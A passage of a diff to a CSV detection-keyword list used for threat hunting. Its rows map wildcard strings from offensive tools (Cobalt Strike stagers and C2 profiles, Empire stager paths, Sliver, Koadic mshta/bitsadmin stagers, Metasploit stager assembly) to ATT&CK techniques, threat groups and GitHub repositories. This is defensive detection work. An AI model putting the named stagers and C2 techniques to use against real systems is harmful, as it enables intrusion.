T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stageless payload*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*stager/js/bitsadmin *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/disk*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/mshta*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" @@ -17326,56 +17509,56 @@ "*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes 